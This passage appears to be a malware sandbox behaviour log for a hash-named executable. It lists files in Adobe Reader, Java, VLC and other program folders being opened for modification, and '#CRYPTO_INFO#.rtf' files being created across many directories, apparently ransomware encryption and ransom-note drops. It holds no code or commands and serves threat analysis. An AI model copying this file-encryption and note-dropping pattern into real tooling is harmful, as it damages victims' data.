C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_anonymoususer_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_audit_report_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javafx.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\el_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close_dark.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\bin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-io.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_invite_24.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jconsole.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_HK.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightItalic.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-disabled.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\file_obj.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javadoc.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\move.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\rna-main.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Microsoft Office 15\ClientX64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722122910.pma 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jabswitch.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\charsets.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.properties.src 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files 